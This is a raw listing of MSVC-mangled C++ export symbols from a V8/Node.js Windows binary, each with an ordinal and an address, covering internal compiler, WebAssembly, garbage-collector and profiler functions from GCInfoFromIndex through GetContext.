                                                                                                                                                                                                                                    ?GCInfoFromIndex@GlobalGCInfoTable@internal@cppgc@@SAAEBUGCInfo@23@G@Z71450x140504650
                                                                                                                                                                                                                                    ?GPParameterCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ71460x14057eee0
                                                                                                                                                                                                                                    ?GeneralizeField@MapUpdater@internal@v8@@AEAAXV?$Handle@VMap@internal@v8@@@23@VInternalIndex@23@W4PropertyConstness@23@VRepresentation@23@V?$Handle@VFieldType@internal@v8@@@23@@Z71470x14092f380
                                                                                                                                                                                                                                    ?GeneralizeField@MapUpdater@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@VInternalIndex@23@W4PropertyConstness@23@VRepresentation@23@V?$Handle@VFieldType@internal@v8@@@23@@Z71480x14092f3a0
                                                                                                                                                                                                                                    ?GenerateCode@CodeAssembler@compiler@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVCodeAssemblerState@234@AEBUAssemblerOptions@34@PEBVProfileDataFromFile@34@@Z71490x1410ab7e0
                                                                                                                                                                                                                                    ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAV?$unique_ptr@VJSHeapBroker@compiler@internal@v8@@U?$default_delete@VJSHeapBroker@compiler@internal@v8@@@std@@@std@@@Z71500x14109a160
                                                                                                                                                                                                                                    ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAVCallDescriptor@234@PEAVGraph@234@AEBUAssemblerOptions@34@PEAVSchedule@234@@Z71510x14109a410
                                                                                                                                                                                                                                    ?GenerateDeoptimizationData@CodeGenerator@compiler@internal@v8@@AEAA?AV?$Handle@VDeoptimizationData@internal@v8@@@34@XZ71520x14106d720
                                                                                                                                                                                                                                    ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@AEAAXXZ71530x1411d89d0
                                                                                                                                                                                                                                    ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@SAXPEAVSchedule@234@@Z71540x1411d8a10
                                                                                                                                                                                                                                    ?GenerateFarJumpTable@JumpTableAssembler@wasm@internal@v8@@SAX_KPEA_KHH@Z71550x140624940
                                                                                                                                                                                                                                    ?GenerateIdentityHash@Isolate@internal@v8@@QEAAHI@Z71560x140b6a090
                                                                                                                                                                                                                                    ?GenerateLazyCompileTable@JumpTableAssembler@wasm@internal@v8@@SAX_KII0@Z71570x140624a00
                                                                                                                                                                                                                                    ?GenerateLiftoffDebugSideTable@wasm@internal@v8@@YA?AV?$unique_ptr@VDebugSideTable@wasm@internal@v8@@U?$default_delete@VDebugSideTable@wasm@internal@v8@@@std@@@std@@PEBVWasmCode@123@@Z71580x140700950
                                                                                                                                                                                                                                    ?GenerationSizesFromHeapSize@Heap@internal@v8@@SAX_KPEA_K1@Z71590x140b06ad0
                                                                                                                                                                                                                                    ?GenerationalBarrier@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX@Z71600x1400971a0
                                                                                                                                                                                                                                    ?GenerationalBarrierForCodeSlow@Heap@internal@v8@@SAXVCode@23@PEAVRelocInfo@23@VHeapObject@23@@Z71610x140b06b80
                                                                                                                                                                                                                                    ?GenerationalBarrierForSourceObject@WriteBarrier@internal@cppgc@@SAXAEBUParams@123@PEBX@Z71620x1400971a0
                                                                                                                                                                                                                                    ?GenerationalBarrierSlow@Heap@internal@v8@@SAXVHeapObject@23@_K0@Z71630x140b06bd0
                                                                                                                                                                                                                                    ?GeneratorRestoreContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71640x1410c4bc0
                                                                                                                                                                                                                                    ?GeneratorRestoreContinuation@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71650x1410c4bd0
                                                                                                                                                                                                                                    ?GeneratorRestoreInputOrDebugPos@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71660x1410c4be0
                                                                                                                                                                                                                                    ?GeneratorRestoreRegister@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71670x1410c4bf0
                                                                                                                                                                                                                                    ?GeneratorStore@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z71680x1410c4cb0
                                                                                                                                                                                                                                    ?Generator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ71690x14053fc50
                                                                                                                                                                                                                                    ?Generator_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ71700x1407dfb90
                                                                                                                                                                                                                                    ?Get@BasicBlockProfiler@internal@v8@@SAPEAV123@XZ71710x140ba17b0
                                                                                                                                                                                                                                    ?Get@ConsString@internal@v8@@QEBAGHVPtrComprCageBase@23@AEBVSharedStringAccessGuardIfNeeded@23@@Z71720x1408dc330
                                                                                                                                                                                                                                    ?Get@DynamicBitSet@internal@v8@@QEBA_NI@Z71730x140845720
                                                                                                                                                                                                                                    ?Get@EphemeronTable@debug@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@3@PEAVIsolate@3@V?$Local@VValue@v8@@@3@@Z71740x140bc9fd0
                                                                                                                                                                                                                                    ?Get@FixedArray@v8@@QEBA?AV?$Local@VData@v8@@@2@V?$Local@VContext@v8@@@2@H@Z71750x140c835b0
                                                                                                                                                                                                                                    ?Get@FlatStringReader@internal@v8@@QEBAIH@Z71760x14053fc60
                                                                                                                                                                                                                                    ?Get@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@H@Z71770x140b7b010
                                                                                                                                                                                                                                    ?Get@GlobalGCInfoTable@internal@cppgc@@SAAEBVGCInfoTable@23@XZ71780x140504670
                                                                                                                                                                                                                                    ?Get@LongTaskStats@metrics@v8@@SA?AU123@PEAVIsolate@3@@Z71790x140c83660
                                                                                                                                                                                                                                    ?Get@Map@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z71800x140c83690
                                                                                                                                                                                                                                    ?Get@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ71810x140c83a20
                                                                                                                                                                                                                                    ?Get@NativeContextStats@internal@v8@@QEBA_K_K@Z71820x14053fc80
                                                                                                                                                                                                                                    ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@I@Z71830x140c83c10
                                                                                                                                                                                                                                    ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z71840x140c83f80
                                                                                                                                                                                                                                    ?Get@PrimitiveArray@v8@@QEAA?AV?$Local@VPrimitive@v8@@@2@PEAVIsolate@2@H@Z71850x140c842c0
                                                                                                                                                                                                                                    ?Get@SlicedString@internal@v8@@QEBAGHVPtrComprCageBase@23@AEBVSharedStringAccessGuardIfNeeded@23@@Z71860x1408dc480
                                                                                                                                                                                                                                    ?Get@StubCache@internal@v8@@QEAA?AVMaybeObject@23@VName@23@VMap@23@@Z71870x140a84b90
                                                                                                                                                                                                                                    ?Get@ThinString@internal@v8@@QEBAGHVPtrComprCageBase@23@AEBVSharedStringAccessGuardIfNeeded@23@@Z71880x1408dc500
                                                                                                                                                                                                                                    ?Get@TypeCache@compiler@internal@v8@@SAPEBV1234@XZ71890x14124de70
                                                                                                                                                                                                                                    ?Get@WasmImportWrapperCache@wasm@internal@v8@@QEBAPEAVWasmCode@234@W4WasmImportCallKind@compiler@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@HW4Suspend@234@@Z71900x1406453d0
                                                                                                                                                                                                                                    ?Get@WasmTableObject@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@I@Z71910x140624aa0
                                                                                                                                                                                                                                    ?GetAbsoluteOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z71920x140a534b0
                                                                                                                                                                                                                                    ?GetAbstractPC@Isolate@internal@v8@@QEAA_KPEAH0@Z71930x140b6a150
                                                                                                                                                                                                                                    ?GetAccessorIndex@LookupIterator@internal@v8@@QEBAHXZ71940x1409338e0
                                                                                                                                                                                                                                    ?GetAccessors@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ71950x1409338f0
                                                                                                                                                                                                                                    ?GetAddress@CFunction@v8@@QEBAPEBXXZ71960x140097290
                                                                                                                                                                                                                                    ?GetAddressHint@CodeRangeAddressHint@internal@v8@@QEAA_K_K0@Z71970x140b481b0
                                                                                                                                                                                                                                    ?GetAliases@RegisterConfiguration@internal@v8@@QEBAHW4MachineRepresentation@23@H0PEAH@Z71980x140bdf670
                                                                                                                                                                                                                                    ?GetAlignedPointerFromEmbedderData@Context@v8@@QEAAPEAXH@Z71990x140097960
                                                                                                                                                                                                                                    ?GetAlignedPointerFromInternalField@Object@v8@@QEAAPEAXH@Z72000x140097800
                                                                                                                                                                                                                                    ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$BasicTracedReference@VObject@v8@@@2@H@Z72010x140097700
                                                                                                                                                                                                                                    ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$PersistentBase@VObject@v8@@@2@H@Z72020x140097700
                                                                                                                                                                                                                                    ?GetAllProfilersMemorySize@CpuProfiler@internal@v8@@SA_KPEAVIsolate@23@@Z72030x14087b960
                                                                                                                                                                                                                                    ?GetAllocatableDoubleCode@RegisterConfiguration@internal@v8@@QEBAHH@Z72040x1405f7d30
                                                                                                                                                                                                                                    ?GetAllocatableFloatCode@RegisterConfiguration@internal@v8@@QEBAHH@Z72050x1405f7d40
                                                                                                                                                                                                                                    ?GetAllocatableGeneralCode@RegisterConfiguration@internal@v8@@QEBAHH@Z72060x1405f7d50
                                                                                                                                                                                                                                    ?GetAllocatableSimd128Code@RegisterConfiguration@internal@v8@@QEBAHH@Z72070x1405f7d60
                                                                                                                                                                                                                                    ?GetAllocatedSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ72080x140097e30
                                                                                                                                                                                                                                    ?GetAllocationHandle@CppHeap@v8@@QEAAAEAVAllocationHandle@cppgc@@XZ72090x1405185c0
                                                                                                                                                                                                                                    ?GetAllocationHandle@Heap@cppgc@@QEAAAEAVAllocationHandle@2@XZ72100x1405185c0
                                                                                                                                                                                                                                    ?GetAllocationProfile@HeapProfiler@v8@@QEAAPEAVAllocationProfile@2@XZ72110x140c843e0
                                                                                                                                                                                                                                    ?GetAndClearCurrentDeoptimizer@Isolate@internal@v8@@QEAAPEAVDeoptimizer@23@XZ72120x14053fd70
                                                                                                                                                                                                                                    ?GetAndResetGlobalHandleResetCount@GlobalHandles@internal@v8@@QEAA_KXZ72130x14052caf0
                                                                                                                                                                                                                                    ?GetAndResetNextReferenceType@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@AEAA?AW4HeapObjectReferenceType@23@XZ72140x1407e9f40
                                                                                                                                                                                                                                    ?GetAndResetNextReferenceType@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@AEAA?AW4HeapObjectReferenceType@23@XZ72150x1407e9f40
                                                                                                                                                                                                                                    ?GetArgumentsType@DeclarationScope@internal@v8@@QEBA?AW4CreateArgumentsType@23@XZ72160x1407ff280
                                                                                                                                                                                                                                    ?GetArrayBufferAllocator@Isolate@v8@@QEAAPEAVAllocator@ArrayBuffer@2@XZ72170x140546a00
                                                                                                                                                                                                                                    ?GetArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@PEAVIsolateData@1@@Z72180x14029e0e0
                                                                                                                                                                                                                                    ?GetArrayId@WebSnapshotSerializer@internal@v8@@AEAAIVJSArray@23@@Z72190x1407b5070
                                                                                                                                                                                                                                    ?GetArrayType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEBVArrayType@234@I@Z72200x140634f60
                                                                                                                                                                                                                                    ?GetAssignedOperand@LiveRange@compiler@internal@v8@@QEBA?AVInstructionOperand@234@XZ72210x14110e940
                                                                                                                                                                                                                                    ?GetAsyncIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z72220x140c843f0
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSCollator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72230x1409947f0
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSDateTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72240x140952d10
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSDisplayNames@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72250x1409833a0
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSListFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72260x14097d170
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSNumberFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72270x14096fc30
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSPluralRules@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72280x140956c80
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSRelativeTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72290x140952d10
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSSegmenter@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72300x140950f90
                                                                                                                                                                                                                                    ?GetAvailableLocales@JSV8BreakIterator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ72310x140950f90
                                                                                                                                                                                                                                    ?GetBackPointer@MapRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ72320x141017710
                                                                                                                                                                                                                                    ?GetBackReferencedObject@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ72330x1407e9f60
                                                                                                                                                                                                                                    ?GetBackReferencedObject@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ72340x1407e9f60
                                                                                                                                                                                                                                    ?GetBackingStore@ArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ72350x140c84400
                                                                                                                                                                                                                                    ?GetBackingStore@SharedArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ72360x140c845a0
                                                                                                                                                                                                                                    ?GetBailoutReason@CpuProfileNode@v8@@QEBAPEBDXZ72370x140c84740
                                                                                                                                                                                                                                    ?GetBarrierForBackgroundCompile@WasmEngine@wasm@internal@v8@@QEAA?AV?$shared_ptr@VOperationsBarrier@internal@v8@@@std@@XZ72380x14064d740
                                                                                                                                                                                                                                    ?GetBaselineExecutionTier@WasmCompilationUnit@wasm@internal@v8@@SA?AW4ExecutionTier@234@PEBUWasmModule@234@@Z72390x1406bd0b0
                                                                                                                                                                                                                                    ?GetBinaryOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4BinaryOperationHint@23@XZ72400x1409aac50
                                                                                                                                                                                                                                    ?GetBitRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@@Z72410x141255440
                                                                                                                                                                                                                                    ?GetBlockById@Schedule@compiler@internal@v8@@QEAAPEAVBasicBlock@234@VId@5234@@Z72420x141068760
                                                                                                                                                                                                                                    ?GetBlockData@FunctionData@Coverage@debug@v8@@QEBA?AVBlockData@234@_K@Z72430x140bca2c0
                                                                                                                                                                                                                                    ?GetBlockStart@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstruction@234@VRpoNumber@234@@Z72440x141032160
                                                                                                                                                                                                                                    ?GetBoolOption@internal@v8@@YA?AV?$Maybe@_N@2@PEAVIsolate@12@V?$Handle@VJSReceiver@internal@v8@@@12@PEBD2PEA_N@Z72450x1408fc130
                                                                                                                                                                                                                                    ?GetBottom@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z72460x140b7b120
                                                                                                                                                                                                                                    ?GetBoundFunction@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ72470x140c84760
                                                                                                                                                                                                                                    ?GetBracketList@ControlEquivalence@compiler@internal@v8@@AEAAAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z72480x1411d8c80
                                                                                                                                                                                                                                    ?GetBreakLocation@BreakIterator@internal@v8@@QEAA?AVBreakLocation@23@XZ72490x140bbaa60
                                                                                                                                                                                                                                    ?GetBuffer@JSTypedArray@internal@v8@@QEAA?AV?$Handle@VJSArrayBuffer@internal@v8@@@23@XZ72500x1409981b0
                                                                                                                                                                                                                                    ?GetBufferSize@EhFrameIterator@internal@v8@@QEAAHXZ72510x140573730
                                                                                                                                                                                                                                    ?GetBuild@Version@internal@v8@@SAHXZ72520x14061dca0
                                                                                                                                                                                                                                    ?GetBytecodeArray@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ72530x141017840
                                                                                                                                                                                                                                    ?GetBytecodeDispatchCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@H@Z72540x14102b740
                                                                                                                                                                                                                                    ?GetBytecodeHandler@Interpreter@interpreter@internal@v8@@QEAA?AVCode@34@W4Bytecode@234@W4OperandScale@234@@Z72550x140a31420
                                                                                                                                                                                                                                    ?GetBytecodeOffsetFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVBytecodeOffset@23@H@Z72560x1408f53f0
                                                                                                                                                                                                                                    ?GetCEntryStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@HHPEBDV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@84@W4StackArgumentOrder@34@@Z72570x14102b940
                                                                                                                                                                                                                                    ?GetCachedNodes@JSGraph@compiler@internal@v8@@QEAAXPEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@@Z72580x1410def10
                                                                                                                                                                                                                                    ?GetCallCount@FeedbackNexus@internal@v8@@QEAAHXZ72590x1409aad10
                                                                                                                                                                                                                                    ?GetCallFeedbackContent@FeedbackNexus@internal@v8@@QEAA?AW4CallFeedbackContent@23@XZ72600x1409aad50
                                                                                                                                                                                                                                    ?GetCallTarget@WasmInstanceObject@internal@v8@@QEAA_KI@Z72610x140624cb0
                                                                                                                                                                                                                                    ?GetCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KI@Z72620x140661fb0
                                                                                                                                                                                                                                    ?GetCanonicalizedValue@InstructionOperand@compiler@internal@v8@@IEBA_KXZ72630x14057ef20
                                                                                                                                                                                                                                    ?GetChild@CpuProfileNode@v8@@QEBAPEBV12@H@Z72640x140c84830
                                                                                                                                                                                                                                    ?GetChild@HeapGraphNode@v8@@QEBAPEBVHeapGraphEdge@2@H@Z72650x140c84860
                                                                                                                                                                                                                                    ?GetChildCovers@TopLevelLiveRange@compiler@internal@v8@@QEAAPEAVLiveRange@234@VLifetimePosition@234@@Z72660x14110e9b0
                                                                                                                                                                                                                                    ?GetChildrenCount@CpuProfileNode@v8@@QEBAHXZ72670x140c848c0
                                                                                                                                                                                                                                    ?GetChildrenCount@HeapGraphNode@v8@@QEBAHXZ72680x140c848d0
                                                                                                                                                                                                                                    ?GetChunkSize@OutputStream@v8@@UEAAHXZ72690x140098ad0
                                                                                                                                                                                                                                    ?GetClass@ControlEquivalence@compiler@internal@v8@@AEAA_KPEAVNode@234@@Z72700x1411d5fc0
                                                                                                                                                                                                                                    ?GetClassId@WebSnapshotSerializer@internal@v8@@AEAAIVJSFunction@23@@Z72710x1407b50b0
                                                                                                                                                                                                                                    ?GetClosureScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ72720x14088ecd0
                                                                                                                                                                                                                                    ?GetClosureScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ72730x140c65160
                                                                                                                                                                                                                                    ?GetClosureScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ72740x140c65160
                                                                                                                                                                                                                                    ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@@Z72750x1405597c0
                                                                                                                                                                                                                                    ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@PEAVSafepointTableBuilder@23@H@Z72760x1405fe0a0
                                                                                                                                                                                                                                    ?GetCode@NativeModule@wasm@internal@v8@@QEBAPEAVWasmCode@234@I@Z72770x140661fe0
                                                                                                                                                                                                                                    ?GetCode@RegExpBytecodeGenerator@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z72780x140855130
                                                                                                                                                                                                                                    ?GetCode@RegExpMacroAssemblerX64@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z72790x140570740
                                                                                                                                                                                                                                    ?GetCode@SharedFunctionInfo@internal@v8@@QEBA?AVCode@23@XZ72800x1408ecc20
                                                                                                                                                                                                                                    ?GetCodeEventTypeName@CodeEvent@v8@@SAPEBDW4CodeEventType@2@@Z72810x140c84930
                                                                                                                                                                                                                                    ?GetCodeFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVCode@23@H@Z72820x1408f5420
                                                                                                                                                                                                                                    ?GetCodeObjectStartFromInnerAddress@CodeObjectRegistry@internal@v8@@QEBA_K_K@Z72830x140b48c00
                                                                                                                                                                                                                                    ?GetCodePages@Isolate@internal@v8@@QEBAPEAV?$vector@UMemoryRange@v8@@V?$allocator@UMemoryRange@v8@@@std@@@std@@XZ72840x140b6a350
                                                                                                                                                                                                                                    ?GetCodeRange@Isolate@v8@@QEAAXPEAPEAXPEA_K@Z72850x140c84a30
                                                                                                                                                                                                                                    ?GetCodeSize@CodeEvent@v8@@QEAA_KXZ72860x140097b70
                                                                                                                                                                                                                                    ?GetCodeStartAddress@CodeEvent@v8@@QEAA_KXZ72870x1400978d0
                                                                                                                                                                                                                                    ?GetCodeTarget@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VCode@internal@v8@@@23@_J@Z72880x140c0f240
                                                                                                                                                                                                                                    ?GetCodeTracer@Isolate@internal@v8@@QEAAPEAVCodeTracer@23@XZ72890x140b6a360
                                                                                                                                                                                                                                    ?GetCodeTracer@WasmEngine@wasm@internal@v8@@QEAAPEAVCodeTracer@34@XZ72900x14064d780
                                                                                                                                                                                                                                    ?GetCodeType@CodeEvent@v8@@QEAA?AW4CodeEventType@2@XZ72910x14041b5f0
                                                                                                                                                                                                                                    ?GetColumn@StackFrame@v8@@QEBAHXZ72920x140097b10
                                                                                                                                                                                                                                    ?GetColumnNumber@CallSiteInfo@internal@v8@@SAHV?$Handle@VCallSiteInfo@internal@v8@@@23@@Z72930x1409fdf70
                                                                                                                                                                                                                                    ?GetColumnNumber@CpuProfileNode@v8@@QEBAHXZ72940x140c84a70
                                                                                                                                                                                                                                    ?GetColumnNumber@JSMessageObject@internal@v8@@QEBAHXZ72950x14095fa90
                                                                                                                                                                                                                                    ?GetColumnNumber@Location@debug@v8@@QEBAHXZ72960x140097a70
                                                                                                                                                                                                                                    ?GetColumnNumber@Location@v8@@QEAAHXZ72970x140097a70
                                                                                                                                                                                                                                    ?GetComment@CodeCommentsIterator@internal@v8@@QEBAPEBDXZ72980x140c0e5f0
                                                                                                                                                                                                                                    ?GetComment@CodeEvent@v8@@QEAAPEBDXZ72990x140097e60
                                                                                                                                                                                                                                    ?GetCommentSize@CodeCommentsIterator@internal@v8@@QEBAIXZ73000x140c0e640
                                                                                                                                                                                                                                    ?GetCommonDominator@BasicBlock@compiler@internal@v8@@SAPEAV1234@PEAV1234@0@Z73010x141068770
                                                                                                                                                                                                                                    ?GetCommonDominator@Scheduler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@PEAV5234@0@Z73020x1411d8cd0
                                                                                                                                                                                                                                    ?GetCommonDominatorIfCached@Scheduler@compiler@internal@v8@@AEAAPEAVBasicBlock@234@PEAV5234@0@Z73030x1411d9110
                                                                                                                                                                                                                                    ?GetCommonSamplingInterval@CpuProfilesCollection@internal@v8@@QEBA?AVTimeDelta@base@3@XZ73040x1408667f0
                                                                                                                                                                                                                                    ?GetCompareOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4CompareOperationHint@23@XZ73050x1409aad90
                                                                                                                                                                                                                                    ?GetCompiledModule@WasmModuleObject@v8@@QEAA?AVCompiledWasmModule@2@XZ73060x140c84a80
                                                                                                                                                                                                                                    ?GetConcurrentlyMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEBA_KXZ73070x140097b70
                                                                                                                                                                                                                                    ?GetConsName@ProfilerListener@internal@v8@@QEAAPEBDPEBDVName@23@@Z73080x14085d380
                                                                                                                                                                                                                                    ?GetConsName@StringsStorage@internal@v8@@QEAAPEBDPEBDVName@23@@Z73090x14085e490
                                                                                                                                                                                                                                    ?GetConstant@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@H@Z73100x14057ef70
                                                                                                                                                                                                                                    ?GetConstantAtIndexAsSmi@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVSmi@34@H@Z73110x140a534c0
                                                                                                                                                                                                                                    ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KN@Z73120x140a5e330
                                                                                                                                                                                                                                    ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVAstRawString@34@@Z73130x140a5e340
                                                                                                                                                                                                                                    ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVScope@34@@Z73140x140a5e350
                                                                                                                                                                                                                                    ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KVAstBigInt@34@@Z73150x140a5e360
                                                                                                                                                                                                                                    ?GetConstructor@MapRef@compiler@internal@v8@@QEBA?AVObjectRef@234@XZ73160x141017ff0
                                                                                                                                                                                                                                    ?GetConstructor@V8HeapExplorer@internal@v8@@SA?AVJSFunction@23@PEAVIsolate@23@VJSReceiver@23@@Z73170x140870f20
                                                                                                                                                                                                                                    ?GetConstructorFeedback@FeedbackNexus@internal@v8@@QEBA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@XZ73180x1409aae40
                                                                                                                                                                                                                                    ?GetConstructorName@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ73190x140c84b80
                                                                                                                                                                                                                                    ?GetConstructorName@V8HeapExplorer@internal@v8@@SA?AVString@23@PEAVIsolate@23@VJSObject@23@@Z73200x140870ff0
                                                                                                                                                                                                                                    ?GetConstructorScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ73210x140c65180
                                                                                                                                                                                                                                    ?GetContext@Recorder@metrics@v8@@SA?AV?$MaybeLocal@VContext@v8@@@3@PEAVIsolate@3@VContextId@123@@Z73220x140c84bc0
